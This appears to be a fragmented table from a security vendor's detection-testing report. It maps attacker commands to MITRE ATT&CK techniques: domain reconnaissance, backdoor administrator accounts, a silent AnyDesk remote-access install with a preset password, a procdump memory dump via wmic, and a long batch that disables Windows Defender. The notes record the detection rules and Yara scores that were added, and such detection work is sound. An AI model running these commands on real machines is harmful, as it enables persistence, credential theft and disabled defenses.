Sr. no.
Commands
1 C:\Windows\system32\cmd.exe /C net time
2 C:\Windows\system32\cmd.exe /C ping qa.corp.qualys.com
3 C:\Windows\system32\cmd.exe /C nltest /dclist:qa.corp.qualys.com
4 C:\Windows\system32\cmd.exe /C Net group "Domain Admins" /domain \
5 C:\Windows\system32\cmd.exe /C nslookup qualys.com
6 C:\Windows\system32\cmd.exe /C ping 190.114.254.116
7 C:\Windows\system32\cmd.exe /C net group /domain
Detection Notes
T1124- System Time Discovery
T1016.001
System Network Configuration Discovery:
Internet Connection Discovery
T1018
Remote System Discovery
T1018
Remote System Discovery
T1069.002
Permission Groups Discovery: Domain
Groups
T1087.002
Account Discovery: Domain Account
T1018
Remote System Discovery
T1016.001
System Network Configuration Discovery:
Internet Connection Discovery
T1018
Remote System Discovery
T1069.002
Permission Groups Discovery: Domain
Groups
T1087.002
Account Discovery: Domain Account
Sr. no. Commands
1 schtasks /create /tn HpSupport22 /tr C:\users\public\music\star.bat /SC ONSTART /F
2 net user oldadiministrator "qc69t4B#Z0kE3" /add
3 net localgroup Administrators old /ADD
4 net user sqlbackup qc69t4b#z0ke3 /add
5 net user localdomain qc69t4b#z0ke3 /add
6 net localgroup administrators localadmin /add
7 reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run /d "$dst$ /
9 powershell -c "$Source = 'https://anydesk.com/en/downloads/thank-you?dv=win_exe'; $Destination='C:\Pr
10 C:\ProgramData\AnyDesk.exe --install
11 C:\ProgramData\AnyDesk --start-with-win --silent
12 echo J9kzQ2Y0qO | C:\ProgramData\AnyDesk.exe --set-password
13 C:\ProgramData\AnyDesk.exe --get-id
15 wmic /node:"" process call create "cmd /c C:\perflogs\procdump.exe -accepteula -ma
Detection Notes
T1053.005
Scheduled Task/Job:
Scheduled Task
T1078.003
Valid Accounts: Local
Accounts
T1136.001
Create Account: Local
Account
T1098 - Account
Manipulation and
T1078.003 - Valid
Accounts: Local
Accounts
T1078.003 - Valid
Accounts: Local
Accounts T1136.001-
Create Account: Local
Account
T1078.003 - Valid
Accounts: Local
Accounts T1136.001-
Create Account: Local
Account
T1098 - Account
Manipulation and
T1078.003 - Valid
Accounts: Local
Accounts
T1547.001-Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder and T1112 - Modify Registry
Yara gave a score of 9
Binary didn't run
Binary didn't run
Binary didn't run
Binary didn't run
T1047
Windows
Management
Instrumentation Procdump has been tagged by Yara with a score of 9; a Procdump rule has been created
Sr. no. Commands Detection
T1562.001
Impair Defenses: Disable or
Modify Tools
Q0025
rem reg add "HKLM\System\CurrentControlSet\Services\ Disable or Stop Services, or
4 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f Terminate Processes
5 rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows T1070
6 Defender" /f Indicator Removal on Host
T1562.001
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
7 "DisableAntiSpyware" /t REG_DWORD /d "1" /f Modify Tools
T1562.001
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
8 "DisableAntiVirus" /t REG_DWORD /d "1" /f Modify Tools
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
9 MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableBehaviorMonitoring" /t
10 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableIOAVProtection" /t
11 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableOnAccessProtection" /t
12 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableRealtimeMonitoring" /t
13 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t
14 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d
15 "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
16 SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
17 SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
18 SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\
20 Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\
Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d
21 "0" /f
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\
23 ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
24 Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
25 Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
26 Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
27 Windows Defender Verification" /Disable
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\
29 Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\
30 Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\
31 Run" /v "WindowsDefender" /f
32 rem Remove WD context menu
33 reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
34 reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
35 reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
36 rem Disable WD services
rem For these to execute successfully, you may need to boot into
37 safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v
38 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v
39 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v
40 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v
41 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v
42 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\
43 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
44 rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v
45 "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\
46 Run" /v "SecurityHealth" /f
Notes
No T1562.001 score was produced
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule
Added a rule